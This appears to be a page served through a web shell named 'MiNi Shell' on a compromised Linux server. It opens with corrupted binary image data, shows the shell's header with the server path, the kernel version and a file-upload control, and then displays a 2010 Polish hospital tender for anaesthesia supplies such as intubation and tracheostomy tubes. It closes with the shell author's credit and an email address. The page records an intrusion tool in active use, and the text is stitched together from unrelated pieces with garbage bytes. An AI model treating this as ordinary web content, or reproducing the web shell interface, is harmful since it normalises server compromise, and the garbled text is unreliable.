JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20101118/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20101118/327673-N-2010.html

<p class="kh_header"><b>Gdynia: Sukcesywne dostawy wyrobów medycznych,
urządzeń do anestezji dla Szpitala Miejskiego im. J. Brudzińskiego w Gdyni.</b><br>
<b>Numer ogłoszenia: 327673 - 2010; data zamieszczenia: 18.11.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> SP ZOZ Szpital Miejski im. J. Brudzińskiego , ul. Wójta Radtkego 1, 81-348 Gdynia, woj. pomorskie, tel. 058 6207501, faks 058 6201114.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> http://szpitalmiejski-gdnia.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Samodzielny publiczny zakład opieki zdrowotnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Sukcesywne dostawy wyrobów medycznych,
urządzeń do anestezji dla Szpitala Miejskiego im. J. Brudzińskiego w Gdyni..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem niniejszego
postępowania o udzielenie zamówienia publicznego są sukcesywne dostawy wyrobów medycznych -
urządzeń do anestezji, rurek intubacyjnych, zbrojonych, ustno - gardłowych, tracheostomijnych oraz filtrów
przeciwbakteryjnych dla Szpitala Miejskiego im. J. Brudzińskiego w Gdyni. GRUPA 1 RURKI
INTUBACYJNE z mankietem niskociśnieniowym 1. 3,5 20 - sztuk; 2. 4,0 40 - sztuk; 3. 4,5 40 - sztuk;
RURKI INTUBACYJNE ZBROJNE z mankietem niskociśnieniowym 4. 3,5 50 - sztuk; 5. 4,0 200 - sztuk; 6.
4,5 400 - sztuk; 7. 10,0 20 - sztuk; GRUPA 2 RURKI INTUBACYJNE z mankietem niskociśnieniowym 1.
5,0 20 - sztuk; 1. 5,0 20 - sztuk; 2. 5,5 40 - sztuk; 3. 6,0 200 - sztuk; 4. 6,5 200 - sztuk; 5. 7,0 1 200 - sztuk;
6. 7,5 2 100 - sztuk; 7. 8,0 2 000 - sztuk; 8. 8,5 1 200 - sztuk; 9. 9,0 400 - sztuk; 10. 9,5 200 - sztuk; 11.
10,0 100 - sztuk; RURKI INTUBACYJNE bez mankietu niskociśnieniowego 12. 2,0 10 - sztuk; 13. 2,5 10 -
sztuk; 14. 3,0 10 - sztuk; RURKI INTUBACYJNE - ZBROJONE z mankietem niskociśnieniowym 15. 5,0
150 - sztuk; 16. 5,5 100 - sztuk; 17. 6,0 300 - sztuk; 18. 6,5 100 - sztuk; 19. 7,0 600 - sztuk; 20. 7,5 300 -
sztuk; 21. 8,0 700 - sztuk; 22. 8,5 100 - sztuk; 23. 9,0 200 - sztuk; GRUPA 3 RURKI TRACHEOSTOMIJNE
z 2 mankietami niskociśnieniowymi 1. 7, 7 1/2, 8 400 - sztuk; GRUPA 4 1. Filtr antybakteryjno-wirusowy z
portem 9 000 - sztuk; 2. Filtr antybakteryjno-wirusowy z nawilżeniem i portem 9 500 - sztuk; GRUPA 5
RURKI USTNO-GARDŁOWE 1. 0; 00,000 - 5 6 800 - sztuk; GRUPA 6 RURKI TRACHEOSTOMIJNEpodwójne, plastikowe, bez otworu 1. 9AS 120 - sztuk; 2. 9AL 40 - sztuk; 3. 8AS 120 - sztuk; 4. 8AL 50 -
sztuk; 5. 7AS 80 - sztuk; 6. 7AL 40 - sztuk; 7 6AS 20 - sztuk; 8 6AL 20 - sztuk; RURKI
TRACHEOSTOMIJNE podwójne, plastikowe, z otworem 9 6BS 10 - sztuk; 10 6BL 10 - sztuk; 11 9BS 20 -
sztuk; 12 9BL 20 - sztuk; 13 8BS 20 - sztuk; 14 8BL 20 - sztuk; 15 7BS 30 - sztuk; 16 7BL 20 - sztuk; 17
10BL 4 - sztuk; DREN DO LECZENIA ZATOK 18 II 1,2 240 - sztuk.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 33.17.21.00-7.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 6.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 24.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga od Wykonawców wniesienia wadium.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie konkretyzuje warunku udziału w postępowaniu. Ocena spełniania warunku
nastąpi na podstawie oświadczenia, przedłożonego przez wykonawcę wraz z ofertą</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie konkretyzuje warunku udziału w postępowaniu. Ocena spełniania warunku
nastąpi na podstawie oświadczenia, przedłożonego przez wykonawcę wraz z ofertą</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie konkretyzuje warunku udziału w postępowaniu. Ocena spełniania warunku
nastąpi na podstawie oświadczenia, przedłożonego przez wykonawcę wraz z ofertą</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie konkretyzuje warunku udziału w postępowaniu. Ocena spełniania warunku
nastąpi na podstawie oświadczenia, przedłożonego przez wykonawcę wraz z ofertą</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie konkretyzuje warunku udziału w postępowaniu. Ocena spełniania warunku
nastąpi na podstawie oświadczenia, przedłożonego przez wykonawcę wraz z ofertą</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY , USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane dostawy, usługi lub roboty budowlane odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;">próbki, opisy lub fotografie</li>

</ul><p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1) oryginalne ulotki/katalogi informacyjne pochodzące od producenta oferowanego asortymentu
wraz z fotografią (rysunkiem) potwierdzające, iż oferowany asortyment jest zgodny z wymaganymi
parametrami określonymi przez Zamawiającego w załączniku nr 4 do SIWZ - FORMULARZ
CENOWY. W przypadku braku wymaganych informacji w ulotce/katalogu, opis produktu
sporządzony przez wykonawcę, jako uzupełnienie danych zawartych w ulotce/katalogu
informacyjnym; 2) wzory przedmiotu zamówienia (próbki) w ilości co najmniej 1 ( jedna ) sztuka z
każdego rodzaju asortymentu w oryginalnych opakowaniach handlowych; 3) oświadczenie, że
oferowany w niniejszym postępowaniu o udzielenie zamówienia publicznego asortyment posiada
odpowiednie świadectwa i certyfikaty dopuszczające do stosowania i obrotu na terenie Polski i
krajów UE.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zmiany zawartej umowy będą wymagały pisemnego aneksu, w zakresie ustalonym w załączonym do SIWZ
wzorze umowy. 1.Istotne zmiany zawartej umowy w stosunku do treści oferty, na podstawie której wyłoniono
wykonawcę mogą dotyczyć: 1) wynagrodzenia brutto wykonawcy, 2) częstotliwości dostaw, miejsca
dostaw, 3) obniżenia cen asortymentu wskazanego w umowie, 4) zmiany nazwy produktu przy zachowaniu
jego parametrów, gdy wprowadzony zostanie do sprzedaży przez producenta produkt zmodyfikowany /
udoskonalony, przy czym zmiana ta nie może powodować zmiany ceny zawartej w ofercie. Zmiany, o
których mowa powyżej mogą być dokonane w następujących przypadkach: 1) ustawowej zmiany stawki
podatku od towarów i usług (VAT), 2) w zakresie o którym mowa w ust. 1 pkt. 3, w przypadku: a) zmian
wprowadzonych przez producentów, obniżki marży, b) zmian kursu waluty w przypadku towarów
importowanych, zgodnie z tabelą NBP; 3) jeżeli zmiany nie spowodują negatywnych konsekwencji dla
Zamawiającego; 4) w przypadkach określonych we wzorze umowy. Strona wnioskująca o zmianę umowy,
przedkłada drugiej stronie pisemne uzasadnienie konieczności wprowadzenia zmian do umowy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.szpitalmiejski-gdynia.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Dział Zamówień Publicznych Szpitala Miejskiego im. J. Brudzińskiego, ul. Wójta
Radtkego 1, 81-348 Gdynia, budynek gospodarczy, pokój 11...</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 29.11.2010 godzina 10:00, miejsce: Dział Zamówień Publicznych Szpitala Miejskiego im. J. Brudzińskiego, ul. Wójta
Radtkego 1, 81-348 Gdynia, budynek gospodarczy, pokój 11...</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> GRUPA 1..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> RURKI
INTUBACYJNE z mankietem niskociśnieniowym 1. 3,5 20 - sztuk; 2. 4,0 40 - sztuk; 3. 4,5 40 - sztuk;
RURKI INTUBACYJNE ZBROJNE z mankietem niskociśnieniowym 4. 3,5 50 - sztuk; 5. 4,0 200 -
sztuk; 6. 4,5 400 - sztuk; 7. 10,0 20 - sztuk;..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.17.21.00-7.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 24.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> GRUPA 2..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> RURKI
INTUBACYJNE z mankietem niskociśnieniowym 1. 5,0 20 - sztuk; 1. 5,0 20 - sztuk; 2. 5,5 40 - sztuk;
3. 6,0 200 - sztuk; 4. 6,5 200 - sztuk; 5. 7,0 1 200 - sztuk; 6. 7,5 2 100 - sztuk; 7. 8,0 2 000 - sztuk; 8.
8,5 1 200 - sztuk; 9. 9,0 400 - sztuk; 10. 9,5 200 - sztuk; 11. 10,0 100 - sztuk; RURKI INTUBACYJNE
bez mankietu niskociśnieniowego 12. 2,0 10 - sztuk; 13. 2,5 10 - sztuk; 14. 3,0 10 - sztuk; RURKI
INTUBACYJNE - ZBROJONE z mankietem niskociśnieniowym 15. 5,0 150 - sztuk; 16. 5,5 100 -
sztuk; 17. 6,0 300 - sztuk; 18. 6,5 100 - sztuk; 19. 7,0 600 - sztuk; 20. 7,5 300 - sztuk; 21. 8,0 700 -
sztuk; 22. 8,5 100 - sztuk; 23. 9,0 200 - sztuk;..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.17.21.00-7.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 24.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> GRUPA 3.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> RURKI
TRACHEOSTOMIJNE z 2 mankietami niskociśnieniowymi 1. 7, 7 1/2, 8 400 - sztuk;..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.17.21.00-7.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 24.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> GRUPA 4.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. Filtr
antybakteryjno-wirusowy z portem 9 000 - sztuk; 2. Filtr antybakteryjno-wirusowy z nawilżeniem i
portem 9 500 - sztuk;..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.17.21.00-7.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 24.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> GRUPA 5.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> RURKI USTNOGARDŁOWE
1. 0; 00,000 - 5 6 800 - sztuk;..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.17.21.00-7.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 24.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> GRUPA 6.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> RURKI
TRACHEOSTOMIJNE podwójne, plastikowe, bez otworu 1. 9AS 120 - sztuk; 2. 9AL 40 - sztuk; 3. 8AS
120 - sztuk; 4. 8AL 50 - sztuk; 5. 7AS 80 - sztuk; 6. 7AL 40 - sztuk; 7 6AS 20 - sztuk; 8 6AL 20 - sztuk;
RURKI TRACHEOSTOMIJNE podwójne, plastikowe, z otworem 9 6BS 10 - sztuk; 10 6BL 10 - sztuk;
11 9BS 20 - sztuk; 12 9BL 20 - sztuk; 13 8BS 20 - sztuk; 14 8BL 20 - sztuk; 15 7BS 30 - sztuk; 16 7BL
20 - sztuk; 17 10BL 4 - sztuk; DREN DO LECZENIA ZATOK 18 II 1,2 240 - sztuk;..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.17.21.00-7.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 24.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com